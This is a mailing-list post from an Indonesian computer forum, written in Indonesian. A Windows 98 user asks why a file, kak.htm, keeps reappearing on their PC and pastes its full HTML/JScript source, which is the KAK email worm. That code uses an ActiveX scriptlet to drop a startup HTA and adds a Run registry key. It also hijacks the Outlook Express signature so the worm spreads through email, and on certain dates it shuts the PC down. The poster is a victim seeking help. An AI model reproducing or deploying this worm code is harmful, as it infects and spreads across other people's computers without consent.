Komputer saya pentium II 450 Mhz, 64 Mb. Setiap kali saya menjalankan
Windows 98, selalu terbentuk file kak.htm di folder C:/Windows. Pada
registry Windows juga tercatat adanya file kak di
HKEY_CURRENT_USER\INDENTITIES\SOFTWARE\MICROSOFT \OUTLOOK
EXPRESS\5.0\SIGNATURES\00000000
Dan juga di key HKEY_USERS\DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENT
VERSION\EXPLORER\DOC FIND SPEC MRU
Bila saya mencoba menghapus key-key tsb dari registry dan juga menghapus
file kak.htm dari C:\Windows, dan kemudian PC saya restart, file tsb akan
terbentuk seperti semula lagi.
Sebelum ini kejadiannya lebih parah dari ini. Pada saat PC di on-kan dan
Windows berjalan, muncul kotak dialog yang berisi kata-kata
"Kagou-Anti-Kro$oftsays not today!". Bila tombol Ok pada kotak dialog tsb di
klik, maka Windows akan men-shutdown PC.
Oh ya, saya sudah mencoba men-scan PC saya dengan PC CILLIN 6.0 virus
pattern 586,d an dilaporkan tidak ada virus yang ditemukan. Bagaimana cara
mengatasi persoalan ini dan apa sebenarnya yang menimpa PC saya?
Berikut ini adalah kode HTMl dari file kak.htm yang terbentuk di C:\Windows
PC saya:
<HTML><BODY><DIV
style="POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></OBJECT></DIV><SCRIPT><!--
function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver
Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>fun
ction sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.Get
Folder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=mye.item();ids=new
String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=wd+'MENUD�~1\\\\PRO
GRA~1\\\\D�MARR~1\\\\kak.hta';ken=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\kak
.hta';k2=wd+'System\\\\'+fic+'.hta';kk=(fs.FileExists(kfr))?kfr:ken;aek='C:\
\\\AE.KAK';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(aek)){re=/kak.hta/i;if
(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(aek);t1=f1.OpenAs
TextStream(8);pth=(kk==kfr)?wd+'MENUD�~1\\\\PROGRA~1\\\\D�MARR~1\\\\kak.hta'
:ken;t1.WriteLine('@echo off>'+pth);t1.WriteLine('del
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFile(kk,k2);fs.GetFile(k2)
.Attributes=2;}t2=fs.CreateTextFile(wd+'kak.reg');t2.write('REGEDIT4');t2.Wr
iteBlankLines(2);ky='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software
\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg='\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Defa
ult
Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\000
00000]');t2.WriteLine('\"name\"=\"Signature
#1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"')
;t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLine
s(2);t2.WriteLine(ky+']');t2.Write('\"Signature
Flags\"=dword:00000003');t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MAC
HINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Writ
e('\"cAg0u\"=\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\\\\\'+fic+'.hta\"');t2.Wri
teBlankLines(2);t2.close();wsh.Run(wd+'Regedit.exe -s
'+wd+'kak.reg');t3=fs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML><BODY><
DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT
classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=scr></"+"OBJECT></"+"DIV>');t4=fs.OpenTextFile(k2,1);while(t4.Read(1)!='Z
');t3.WriteLine('<SCRIPT><!--');t3.write('function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.clos
e();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'
\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLa
nguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"
C:\\\\\\\\windows\\\\\\\\Menu
D�marrer\\\\\\\\Programmes\\\\\\\\D�marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\win
dows\\\\\\\\Start
Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent
.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersi
on)>4))||(agt.indexOf(\"msie
.\")!=-1))scr.write();');t3.write('// --></"+"'+'SCRIPT></"+"'+'OBJECT></"+
"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs
.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 &&
d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today
!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc
failed
!]]%%%%%</"+"BODY></"+"HTM";la=(navigator.systemLanguage)?navigator.systemLa
nguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu
D�marrer\\Programmes\\D�marrage\\kak.hta":"C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if((
(agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
("msie 5.")!=-1))scr.write();
// --></SCRIPT></OBJECT></BODY></HTML>
------------------------------------------------------------------------
[EMAIL PROTECTED] - Mailing List (milis) MIKRODATA
Post message: [EMAIL PROTECTED]
Subscribe : [EMAIL PROTECTED]
Unsubscribe : [EMAIL PROTECTED]
Website : http://mikrodata.co.id
FTPsite : ftp.mikrodata.co.id
Archives : http://www.mail-archive.com/forum%40mikrodata.co.id/
Milis ini menjadi kontribusi rubrik Konsultasi, Klinik Virus, Opini IT,
Klinik Linux, dan Antar Pembaca di MIKRODATA, Info Komputer,
Detikcom (i-Net), KOMPAS Cyber Media (KCM), dan AntiVirus Media.
